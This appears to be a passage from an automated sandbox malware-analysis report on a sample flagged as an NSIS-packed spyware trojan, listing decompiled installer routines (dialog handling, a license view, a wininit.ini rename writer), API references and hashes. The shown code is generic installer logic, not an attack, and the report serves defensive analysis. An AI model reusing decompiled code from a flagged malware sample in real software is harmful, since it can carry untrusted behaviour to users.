								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x0040503e
0x00405057
0x0040505c
0x00405064
0x0040506a
0x00405080
0x00405083
0x004052ae
0x004052b5
0x004052c9
0x004052b7
0x004052b9
0x004052bc
0x004052bd
0x004052c4
0x004052c4
0x004052d5
0x004052e3
0x004052e6
0x004052fc
0x00405371
0x00405374
0x00405376
0x00405380
0x0040538e
0x0040538e
0x00405390
0x0040539a
0x004053a0
0x004053a3
0x004053a6
0x004053c1
0x004053a8
0x004053b2
0x004053b2
0x004053a6
0x0040539a
0x00000000
0x00405374
0x00405301
0x0040530c
0x00405311
0x00405318
0x0040531d
0x00405321
0x0040532c
0x0040532c
0x00405330
0x00405334
0x00405338
0x0040534b
0x0040533a
0x0040533a
0x00405341
0x00405347
0x00405343
0x00405343
0x00405343
0x00405341
0x0040534f
0x00405351
0x00405364
0x00405367
0x0040536a
0x0040536a
0x00405334
0x00000000
0x00405321
0x00405303
0x0040530a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053c4
0x004053c4
0x004053cb
0x0040543c
0x00405444
0x0040544c
0x0040544c
0x00405455
0x00405457
0x0040545e
0x00405461
0x00405461
0x00405467
0x0040546e
0x00405471
0x00405471
0x00405477
0x0040547d
0x00405483
0x00405483
0x00405490
0x004055f1
0x004055f8
0x00405615
0x0040561b
0x0040562d
0x0040562d
0x00000000
0x00405496
0x00405498
0x0040549d
0x004054a2
0x004054a7
0x004054a9
0x004054a9
0x004054aa
0x004054ab
0x004054ad
0x004054ad
0x004054b5
0x004054f6
0x004054f8
0x00405508
0x0040550b
0x00405510
0x00405517
0x0040551a
0x004055bc
0x004055c5
0x004055cd
0x004055cd
0x004055db
0x004055ec
0x004055ec
0x00000000
0x004055db
0x00405520
0x00405523
0x00405529
0x0040552e
0x00405530
0x00405532
0x00405538
0x0040553f
0x00405544
0x0040554b
0x0040554e
0x0040554e
0x00405555
0x00405561
0x00405565
0x00405567
0x00405567
0x00405557
0x00405559
0x00405559
0x00405587
0x00405593
0x004055a2
0x004055a2
0x004055a4
0x004055a7
0x004055b0
0x00000000
0x004054b7
0x004054c2
0x004054c5
0x004054ca
0x004054cc
0x004054d0
0x004054e0
0x004054ea
0x004054ec
0x004054ef
0x00000000
0x00000000
0x00000000
0x00000000
0x004054d2
0x004054d2
0x004054d8
0x004054da
0x004054da
0x004054db
0x004054dc
0x00000000
0x004054d2
0x004054b5
0x00405490
0x004053d3
0x00000000
0x004053e9
0x004053f3
0x004053f8
0x00000000
0x00000000
0x0040540a
0x0040540f
0x0040541b
0x0040541b
0x0040541d
0x0040542c
0x0040542e
0x00405432
0x00405435
0x00000000
0x00405435
0x004053d3
0x00405089
0x0040508e
0x00405097
0x0040509e
0x004050b0
0x004050bb
0x004050c1
0x004050cf
0x004050e3
0x004050e8
0x004050f5
0x004050fa
0x00405110
0x00405121
0x0040512e
0x0040512e
0x00405131
0x00405137
0x00405139
0x0040513c
0x00405141
0x00405146
0x00405148
0x00405148
0x00405168
0x00405168
0x0040516a
0x0040516b
0x00405170
0x00405176
0x0040517a
0x0040517f
0x00405187
0x0040518b
0x00405190
0x00405195
0x0040519d
0x004051a0
0x00405270
0x00405283
0x00000000
0x004051a6
0x004051a9
0x004051ac
0x004051af
0x004051af
0x004051b5
0x004051be
0x004051c1
0x004051c5
0x004051c8
0x004051cb
0x004051d4
0x004051dd
0x004051e0
0x004051e3
0x004051e6
0x00405224
0x0040524f
0x00405226
0x00405235
0x00405235
0x004051e8
0x004051eb
0x004051f9
0x00405203
0x0040520b
0x00405212
0x0040521d
0x0040521d
0x004051e6
0x00405255
0x00405256
0x00405262
0x00405262
0x0040526e
0x00405289
0x0040528c
0x004052a9
0x00000000
0x0040528e
0x00405293
0x0040529c
0x0040562f
0x00405641
0x00405641
0x0040528c
0x00000000
0x0040526e
0x004051a0

APIs

GetDlgItem.USER32 ref: 0040504F
GetDlgItem.USER32 ref: 0040505A
GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
LoadImageW.USER32 ref: 004050BB
SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
SendMessageW.USER32(?,00001109,00000002), ref: 00405110
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
DeleteObject.GDI32(00000000), ref: 00405131
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233

Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
GetWindowLongW.USER32(?,000000F0), ref: 00405275
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
ShowWindow.USER32(?,00000005), ref: 00405293
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
ImageList_Destroy.COMCTL32(?), ref: 00405461
GlobalFree.KERNEL32 ref: 00405471
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
SendMessageW.USER32(?,00001102,?,?), ref: 00405593
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
ShowWindow.USER32(?,00000000), ref: 0040561B
GetDlgItem.USER32 ref: 00405626
ShowWindow.USER32(00000000), ref: 0040562D

Strings

N, xrefs: 004052CC
M, xrefs: 004051EB
, xrefs: 00405605

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}

0x0040479b
0x004048c8
0x00404925
0x00404929
0x004049f6
0x004049f8
0x004049f8
0x004049fe
0x004049fe
0x00404a01
0x00000000
0x00404a08
0x00404937
0x0040493d
0x00404947
0x00404952
0x00404955
0x00404958
0x00404963
0x00404966
0x0040496d
0x0040497a
0x0040498b
0x00404991
0x00404993
0x00404999
0x004049a7
0x004049ad
0x004049ad
0x0040496d
0x004049b7
0x00000000
0x004049c2
0x004049c6
0x004049d6
0x004049d6
0x004049dc
0x004049e8
0x004049e8
0x00000000
0x004049ec
0x004049b7
0x004048d3
0x00000000
0x004048e5
0x004048ea
0x004048f0
0x00000000
0x00000000
0x00404919
0x0040491b
0x00404920
0x00000000
0x00404920
0x004048d3
0x004047a1
0x004047a4
0x004047a9
0x004047ba
0x004047ba
0x004047c2
0x004047c5
0x004047c9
0x004047cc
0x004047d0
0x004047d3
0x004047d6
0x004047d9
0x004047e0
0x004047e2
0x004047e2
0x004047ec
0x004047f9
0x00404803
0x00404808
0x0040480b
0x00404810
0x00404827
0x0040482e
0x00404841
0x00404844
0x00404858
0x0040485f
0x00404864
0x00404869
0x00404869
0x00404877
0x00404885
0x00404897
0x0040489c
0x004048ac
0x004048ae
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
GetDlgItem.USER32 ref: 0040483B
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
GetSysColor.USER32(?), ref: 00404869
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
lstrlenW.KERNEL32(?), ref: 0040488A
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
GetDlgItem.USER32 ref: 00404905
SendMessageW.USER32(00000000), ref: 0040490C
GetDlgItem.USER32 ref: 00404937
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
LoadCursorW.USER32(00000000,00007F02), ref: 00404988
SetCursor.USER32(00000000), ref: 0040498B
LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
SetCursor.USER32(00000000), ref: 004049A7
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8

Strings

N, xrefs: 00404925
@jz, xrefs: 00404993

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: @jz$N
API String ID: 3103080414-4087404676
Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062b4
0x004062bd
0x004062c4
0x004062ce
0x004062e2
0x0040630a
0x00406311
0x00406315
0x00406319
0x00406339
0x00406340
0x0040634a
0x00406357
0x0040635c
0x00406361
0x00406365
0x00406374
0x00406376
0x00406383
0x00406387
0x00406422
0x00000000
0x0040639d
0x004063aa
0x004063ce
0x004063d2
0x004063f1
0x004063f5
0x004063f5
0x004063f7
0x00406400
0x0040640b
0x00406416
0x0040641c
0x00000000
0x0040641c
0x004063d4
0x004063d7
0x004063e2
0x004063de
0x004063e0
0x004063e1
0x004063e1
0x004063e9
0x004063eb
0x00000000
0x004063eb
0x004063b5
0x004063bb
0x00000000
0x004063bb
0x00406387
0x00406365
0x004062e4
0x004062ef
0x004062f8
0x004062fc
0x00000000
0x00000000
0x004062fc
0x0040642d

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
GetShortPathNameW.KERNEL32 ref: 004062F8

Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105

GetShortPathNameW.KERNEL32 ref: 00406315
wsprintfA.USER32 ref: 00406333
GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
GlobalFree.KERNEL32 ref: 0040641C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423

Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

Strings

(Vz, xrefs: 004062DD
[Rename], xrefs: 0040639D, 004063AF
%ls=%ls, xrefs: 00406329
(^z, xrefs: 0040630A
(^z, xrefs: 00406311

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
